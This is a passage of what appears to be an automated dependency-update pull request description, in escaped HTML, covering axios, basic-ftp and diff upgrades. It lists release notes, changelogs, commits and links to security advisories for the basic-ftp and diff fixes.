href=\"https://redirect.github.com/axios/axios/issues/6933\"\u003e#6933\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/3d343b86dc4fd0eea0987059c5af04327c7ae304\"\u003e3d343b8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e improved fetchOptions interface (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6867\"\u003e#6867\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/63f1fce233009f5db1abf2586c145825ac98c3d7\"\u003e63f1fce\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+30/-19 ([#6933](https://github.com/axios/axios/issues/6933) [#6920](https://github.com/axios/axios/issues/6920) [#6893](https://github.com/axios/axios/issues/6893) [#6892](https://github.com/axios/axios/issues/6892) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/noritaka1166\" title=\"+2/-6 ([#6922](https://github.com/axios/axios/issues/6922) [#6923](https://github.com/axios/axios/issues/6923) )\"\u003eNoritaka Kobayashi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/dimitry-lzs\" title=\"+4/-0 ([#6917](https://github.com/axios/axios/issues/6917) )\"\u003eDimitrios Lazanas\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/AdrianKnapp\" title=\"+2/-2 ([#6867](https://github.com/axios/axios/issues/6867) )\"\u003eAdrian Knapp\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/howiezhao\" title=\"+3/-1 ([#6872](https://github.com/axios/axios/issues/6872) )\"\u003eHowie Zhao\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/warpdev\" title=\"+1/-1 ([#6883](https://github.com/axios/axios/issues/6883) )\"\u003eUhyeon Park\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/stscoundrel\" title=\"+1/-1 ([#6913](https://github.com/axios/axios/issues/6913) )\"\u003eSampo Silvennoinen\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eRelease v1.9.0\u003c/h2\u003e\n\u003ch2\u003eRelease notes:\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fix the Axios constructor implementation to treat the config argument as optional; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6881\"\u003e#6881\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/6c5d4cd69286868059c5e52d45085cb9a894a983\"\u003e6c5d4cd\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003efetch:\u003c/strong\u003e fixed ERR_NETWORK mapping for Safari browsers; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6767\"\u003e#6767\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/dfe8411c9a082c3d068bdd1f8d6e73054f387f45\"\u003edfe8411\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e allow iterable objects to be a data source for the set method; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6873\"\u003e#6873\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/1b1f9ccdc15f1ea745160ec9a5223de9db4673bc\"\u003e1b1f9cc\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fix \u003ccode\u003egetSetCookie\u003c/code\u003e by using 'get' method for caseless access; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6874\"\u003e#6874\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d4f7df4b304af8b373488fdf8e830793ff843eb9\"\u003ed4f7df4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fixed support for setting multiple header values from an iterated source; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6885\"\u003e#6885\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/f7a3b5e0f7e5e127b97defa92a132fbf1b55cf15\"\u003ef7a3b5e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ehttp:\u003c/strong\u003e send minimal end multipart boundary (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6661\"\u003e#6661\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/987d2e2dd3b362757550f36eab875e60640b6ddc\"\u003e987d2e2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e fix autocomplete for adapter config (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6855\"\u003e#6855\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/e61a8934d8f94dd429a2f309b48c67307c700df0\"\u003ee61a893\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAxiosHeaders:\u003c/strong\u003e add getSetCookie method to retrieve set-cookie headers values (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5707\"\u003e#5707\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/80ea756e72bcf53110fa792f5d7ab76e8b11c996\"\u003e80ea756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+200/-34 ([#6890](https://github.com/axios/axios/issues/6890) [#6889](https://github.com/axios/axios/issues/6889) [#6888](https://github.com/axios/axios/issues/6888) [#6885](https://github.com/axios/axios/issues/6885) [#6881](https://github.com/axios/axios/issues/6881) [#6767](https://github.com/axios/axios/issues/6767) [#6874](https://github.com/axios/axios/issues/6874) [#6873](https://github.com/axios/axios/issues/6873) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/jasonsaayman\" title=\"+26/-1 ()\"\u003eJay\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/WillianAgostini\" title=\"+21/-0 ([#5707](https://github.com/axios/axios/issues/5707) )\"\u003eWillian Agostini\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Gerhut\" title=\"+3/-3 ([#5096](https://github.com/axios/axios/issues/5096) )\"\u003eGeorge Cheng\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/FatahChan\" title=\"+2/-2 ([#6855](https://github.com/axios/axios/issues/6855) )\"\u003eFatahChan\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/igstan\" title=\"+1/-1 ([#6661](https://github.com/axios/axios/issues/6661) )\"\u003eIonuț G. Stan\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eRelease v1.8.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.9.0...v1.10.0\"\u003e1.10.0\u003c/a\u003e (2025-06-14)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eadapter:\u003c/strong\u003e pass fetchOptions to fetch function (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6883\"\u003e#6883\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/0f50af8e076b7fb403844789bd5e812dedcaf4ed\"\u003e0f50af8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eform-data:\u003c/strong\u003e convert boolean values to strings in FormData serialization (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6917\"\u003e#6917\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/5064b108de336ff34862650709761b8a96d26be0\"\u003e5064b10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003epackage:\u003c/strong\u003e add module entry point for React Native; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6933\"\u003e#6933\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/3d343b86dc4fd0eea0987059c5af04327c7ae304\"\u003e3d343b8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e improved fetchOptions interface (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6867\"\u003e#6867\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/63f1fce233009f5db1abf2586c145825ac98c3d7\"\u003e63f1fce\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+30/-19 ([#6933](https://github.com/axios/axios/issues/6933) [#6920](https://github.com/axios/axios/issues/6920) [#6893](https://github.com/axios/axios/issues/6893) [#6892](https://github.com/axios/axios/issues/6892) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/noritaka1166\" title=\"+2/-6 ([#6922](https://github.com/axios/axios/issues/6922) [#6923](https://github.com/axios/axios/issues/6923) )\"\u003eNoritaka Kobayashi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/dimitry-lzs\" title=\"+4/-0 ([#6917](https://github.com/axios/axios/issues/6917) )\"\u003eDimitrios Lazanas\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/AdrianKnapp\" title=\"+2/-2 ([#6867](https://github.com/axios/axios/issues/6867) )\"\u003eAdrian Knapp\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/howiezhao\" title=\"+3/-1 ([#6872](https://github.com/axios/axios/issues/6872) )\"\u003eHowie Zhao\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/warpdev\" title=\"+1/-1 ([#6883](https://github.com/axios/axios/issues/6883) )\"\u003eUhyeon Park\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/stscoundrel\" title=\"+1/-1 ([#6913](https://github.com/axios/axios/issues/6913) )\"\u003eSampo Silvennoinen\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.8.4...v1.9.0\"\u003e1.9.0\u003c/a\u003e (2025-04-24)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fix the Axios constructor implementation to treat the config argument as optional; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6881\"\u003e#6881\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/6c5d4cd69286868059c5e52d45085cb9a894a983\"\u003e6c5d4cd\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003efetch:\u003c/strong\u003e fixed ERR_NETWORK mapping for Safari browsers; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6767\"\u003e#6767\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/dfe8411c9a082c3d068bdd1f8d6e73054f387f45\"\u003edfe8411\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e allow iterable objects to be a data source for the set method; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6873\"\u003e#6873\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/1b1f9ccdc15f1ea745160ec9a5223de9db4673bc\"\u003e1b1f9cc\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fix \u003ccode\u003egetSetCookie\u003c/code\u003e by using 'get' method for caseless access; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6874\"\u003e#6874\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d4f7df4b304af8b373488fdf8e830793ff843eb9\"\u003ed4f7df4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eheaders:\u003c/strong\u003e fixed support for setting multiple header values from an iterated source; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6885\"\u003e#6885\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/f7a3b5e0f7e5e127b97defa92a132fbf1b55cf15\"\u003ef7a3b5e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ehttp:\u003c/strong\u003e send minimal end multipart boundary (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6661\"\u003e#6661\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/987d2e2dd3b362757550f36eab875e60640b6ddc\"\u003e987d2e2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e fix autocomplete for adapter config (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6855\"\u003e#6855\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/e61a8934d8f94dd429a2f309b48c67307c700df0\"\u003ee61a893\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAxiosHeaders:\u003c/strong\u003e add getSetCookie method to retrieve set-cookie headers values (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5707\"\u003e#5707\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/80ea756e72bcf53110fa792f5d7ab76e8b11c996\"\u003e80ea756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/DigitalBrainJS\" title=\"+200/-34 ([#6890](https://github.com/axios/axios/issues/6890) [#6889](https://github.com/axios/axios/issues/6889) [#6888](https://github.com/axios/axios/issues/6888) [#6885](https://github.com/axios/axios/issues/6885) [#6881](https://github.com/axios/axios/issues/6881) [#6767](https://github.com/axios/axios/issues/6767) [#6874](https://github.com/axios/axios/issues/6874) [#6873](https://github.com/axios/axios/issues/6873) )\"\u003eDmitriy Mozgovoy\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/jasonsaayman\" title=\"+26/-1 ()\"\u003eJay\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/WillianAgostini\" title=\"+21/-0 ([#5707](https://github.com/axios/axios/issues/5707) )\"\u003eWillian Agostini\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Gerhut\" title=\"+3/-3 ([#5096](https://github.com/axios/axios/issues/5096) )\"\u003eGeorge Cheng\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/FatahChan\" title=\"+2/-2 ([#6855](https://github.com/axios/axios/issues/6855) )\"\u003eFatahChan\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/igstan\" title=\"+1/-1 ([#6661](https://github.com/axios/axios/issues/6661) )\"\u003eIonuț G. Stan\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.8.3...v1.8.4\"\u003e1.8.4\u003c/a\u003e (2025-03-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/73a836dae75f06055c24561d83cf4ca1c43e2854\"\u003e\u003ccode\u003e73a836d\u003c/code\u003e\u003c/a\u003e chore(release): v1.10.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6943\"\u003e#6943\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/3d343b86dc4fd0eea0987059c5af04327c7ae304\"\u003e\u003ccode\u003e3d343b8\u003c/code\u003e\u003c/a\u003e fix(package): add module entry point for React Native; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6933\"\u003e#6933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0f50af8e076b7fb403844789bd5e812dedcaf4ed\"\u003e\u003ccode\u003e0f50af8\u003c/code\u003e\u003c/a\u003e fix(adapter): pass fetchOptions to fetch function (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6883\"\u003e#6883\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ee7799e13c0783c0fdfa656613bb1af6f5e53ccd\"\u003e\u003ccode\u003eee7799e\u003c/code\u003e\u003c/a\u003e refactor: remove unused import in test (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6922\"\u003e#6922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/eb0a2db04beda089e6bdcb2820f193ed2faecbc3\"\u003e\u003ccode\u003eeb0a2db\u003c/code\u003e\u003c/a\u003e chore: fix typos in test (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6923\"\u003e#6923\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/7d551393c384e58058e04ae954c4cfd929afcd64\"\u003e\u003ccode\u003e7d55139\u003c/code\u003e\u003c/a\u003e docs(readme): improve error descriptions; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6920\"\u003e#6920\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f4fc6b8564ab794e67b4d1147167f2ecfc3557a3\"\u003e\u003ccode\u003ef4fc6b8\u003c/code\u003e\u003c/a\u003e chore(sponsor): update sponsor block (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/5064b108de336ff34862650709761b8a96d26be0\"\u003e\u003ccode\u003e5064b10\u003c/code\u003e\u003c/a\u003e fix(form-data): convert boolean values to strings in FormData serialization (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/c7e0fea78716e86694d5023f8f17d174bf064e8a\"\u003e\u003ccode\u003ec7e0fea\u003c/code\u003e\u003c/a\u003e CI: add Node 24 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6913\"\u003e#6913\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/7ba895c8874f3fdc4e9da992b2b9e34fe5a25b55\"\u003e\u003ccode\u003e7ba895c\u003c/code\u003e\u003c/a\u003e chore(sponsor): update sponsor block (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6907\"\u003e#6907\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.7.9...v1.10.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `basic-ftp` from 5.0.5 to 5.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/releases\"\u003ebasic-ftp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.2.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanged: Skip files with invalid name in downloadToDir.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded: Add the option to prevent the use of separate transfer host IPs when using PASV. (\u003ca href=\"https://redirect.github.com/patrickjuchli/basic-ftp/issues/259\"\u003e#259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/blob/master/CHANGELOG.md\"\u003ebasic-ftp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.2.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanged: Skip files with invalid name in downloadToDir. Fixes security vulnerability CVE-2026-27699, see \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-5rq4-664w-9x2c\"\u003ehttps://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-5rq4-664w-9x2c\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded: Add the option to prevent the use of separate transfer host IPs when using PASV. (\u003ca href=\"https://redirect.github.com/patrickjuchli/basic-ftp/issues/259\"\u003e#259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/5d41e45073ed1a8a3b5e5a1bbfcd131e61295bf8\"\u003e\u003ccode\u003e5d41e45\u003c/code\u003e\u003c/a\u003e Bump version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/49c2e73ed1cae4962ae38b33ab93a3548c2f5622\"\u003e\u003ccode\u003e49c2e73\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/2a2a0e6514357b9eda07c2f8afbd3f04727a7cd9\"\u003e\u003ccode\u003e2a2a0e6\u003c/code\u003e\u003c/a\u003e Skip invalid filenames\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/65c90d949c0f8a9709759dff9e76bbe07061812b\"\u003e\u003ccode\u003e65c90d9\u003c/code\u003e\u003c/a\u003e Fix permissions for workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/593cb7831bec60d5590acc3eeb2e553f4a431167\"\u003e\u003ccode\u003e593cb78\u003c/code\u003e\u003c/a\u003e Set permissions for workflow jobs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/36adf110beabc9acdcad122149a2ea795a2b1a6c\"\u003e\u003ccode\u003e36adf11\u003c/code\u003e\u003c/a\u003e Remove deprecated CodeQL check\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/9da4af0e1f82fe372bedc1b7820f55c6eaf012e5\"\u003e\u003ccode\u003e9da4af0\u003c/code\u003e\u003c/a\u003e Update changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/699303975bea182b966f9f34a1ecbbebe92afcef\"\u003e\u003ccode\u003e6993039\u003c/code\u003e\u003c/a\u003e Improve naming\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/0b8f7560e11af817d70ff17f986b334ba2e99b81\"\u003e\u003ccode\u003e0b8f756\u003c/code\u003e\u003c/a\u003e Improve naming\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patrickjuchli/basic-ftp/commit/67a53f21623e4047d28d7a6f98f539f1adc9d1d0\"\u003e\u003ccode\u003e67a53f2\u003c/code\u003e\u003c/a\u003e Bump version\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/patrickjuchli/basic-ftp/compare/v5.0.5...v5.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~patrickjuchli\"\u003epatrickjuchli\u003c/a\u003e, a new releaser for basic-ftp since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `diff` from 5.2.0 to 5.2.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kpdecker/jsdiff/blob/master/release-notes.md\"\u003ediff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.2 - January 2026\u003c/h2\u003e\n\u003cp\u003eOnly change from 5.2.0 is a backport of the fix to \u003ca href=\"https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\"\u003ehttps://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003ev5.2.1 (deprecated)\u003c/h2\u003e\n\u003cp\u003eAccidental release - do not use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b7b6339dea15baa636bebe7092ec1cbabf001dea\"\u003e\u003ccode\u003eb7b6339\u003c/code\u003e\u003c/a\u003e v5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b5377abefc55cd424e82308515cfbdc4d53ad8a1\"\u003e\u003ccode\u003eb5377ab\u003c/code\u003e\u003c/a\u003e Update package version to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/78017899c4c80d51db805b6e013079cadc6ed0ae\"\u003e\u003ccode\u003e7801789\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/649\"\u003ekpdecker/jsdiff#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/042a8372f331ffd3d81b1e4b799409c7d944e6fd\"\u003e\u003ccode\u003e042a837\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/647\"\u003ekpdecker/jsdiff#647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca 